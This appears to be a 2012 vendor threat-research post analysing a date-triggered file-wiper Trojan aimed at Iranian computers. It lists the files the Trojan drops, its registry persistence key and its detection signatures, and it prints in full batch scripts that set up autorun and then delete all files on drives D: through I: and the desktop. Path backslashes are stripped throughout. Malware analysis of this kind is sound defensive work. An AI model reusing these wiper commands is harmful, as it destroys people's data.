New File Wiper Trojan targeting Iran

December 22, 2012

The Dell Sonicwall Threats research team received reports of a new file wiper Trojan. The purpose of this Trojan is quite simple: Delete files on a range of specified drives on specified dates. This can be on remote storage devices or local external storage as long as they are mounted under certain drive letters. It has been widely reported that the attack is targeted and the Trojan is aimed at affecting Iranian computers.

Infection cycle:

The Trojan adds the following files to the filesystem. These files are contained in the rar compressed portion of the original binary [Detected as GAV: DelFiles.NBV (Trojan)]:

  • %SYSTEM32%jucheck.exe [Detected as GAV: Batchwiper.A (Trojan)]
  • %SYSTEM32%juboot.exe [Detected as GAV: Batchwiper.A (Trojan)]
  • %SYSTEM32%SLEEP.EXE [non-malicious sleep utility]
  • %USERPROFILE%Local SettingsTempE.tmpjuboot.bat [dropped by juboot.exe]
  • %USERPROFILE%Local SettingsTemp11.tmpjucheck.bat [dropped by jucheck.exe]

The Trojan adds the following key to the windows registry to enable startup after reboot:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun jucheck.exe "%SYSTEM32%jucheck.exe"

The file juboot.bat contains the following data that is used to initiate infection:

      @echo off & setlocal
      sleep for 2
      REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v jucheck.exe /t REG_SZ /d "%systemroot%system32jucheck.exe" /f
      start "" /D"%systemroot%system32" "jucheck.exe"

The file jucheck.bat contains the following data which causes all files on the desktop and in drives D: through I: to be wiped on the specified dates:

      @echo off & setlocal
      sleep for 2
      del "%systemroot%system32juboot.exe" /q /s /f
      del "%userprofile%Start MenuProgramsStartupGrooveMonitor.exe" /q /s /f
      if "%date%"=="Mon 12/10/2012" goto yes
      if "%date%"=="Tue 12/11/2012" goto yes
      if "%date%"=="Wed 12/12/2012" goto yes
      if "%date%"=="Mon 01/21/2013" goto yes
      if "%date%"=="Tue 01/22/2013" goto yes
      if "%date%"=="Wed 01/23/2013" goto yes
      if "%date%"=="Mon 05/06/2013" goto yes
      if "%date%"=="Tue 05/07/2013" goto yes
      if "%date%"=="Wed 05/08/2013" goto yes
      if "%date%"=="Mon 07/22/2013" goto yes
      if "%date%"=="Tue 07/23/2013" goto yes
      if "%date%"=="Wed 07/24/2013" goto yes
      if "%date%"=="Mon 11/11/2013" goto yes
      if "%date%"=="Tue 11/12/2013" goto yes
      if "%date%"=="Wed 11/13/2013" goto yes
      if "%date%"=="Mon 02/03/2014" goto yes
      if "%date%"=="Tue 02/04/2014" goto yes
      if "%date%"=="Wed 02/05/2014" goto yes
      if "%date%"=="Mon 05/05/2014" goto yes
      if "%date%"=="Tue 05/06/2014" goto yes
      if "%date%"=="Wed 05/07/2014" goto yes
      if "%date%"=="Mon 08/11/2014" goto yes
      if "%date%"=="Tue 08/12/2014" goto yes
      if "%date%"=="Wed 08/13/2014" goto yes
      if "%date%"=="Mon 02/02/2015" goto yes
      if "%date%"=="Tue 02/03/2015" goto yes
      if "%date%"=="Wed 02/04/2015" goto yes
      goto no
      sleep for 3000
      IF EXIST d: del "d:*.*" /q /s /f
      IF EXIST d: Chkdsk d:
      IF EXIST e: del "e:*.*" /q /s /f
      IF EXIST e: Chkdsk e:
      IF EXIST f: del "f:*.*" /q /s /f
      IF EXIST f: Chkdsk f:
      IF EXIST g: del "g:*.*" /q /s /f
      IF EXIST g: Chkdsk g:
      IF EXIST h: del "h:*.*" /q /s /f
      IF EXIST h: Chkdsk h:
      IF EXIST i: del "i:*.*" /q /s /f
      IF EXIST i: Chkdsk i:
      del "%userprofile%Desktop*.*" /q /s /f
      \start calc

The .bat files are deleted after execution.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: DelFiles.NBV (Trojan)
  • GAV: Batchwiper.A (Trojan)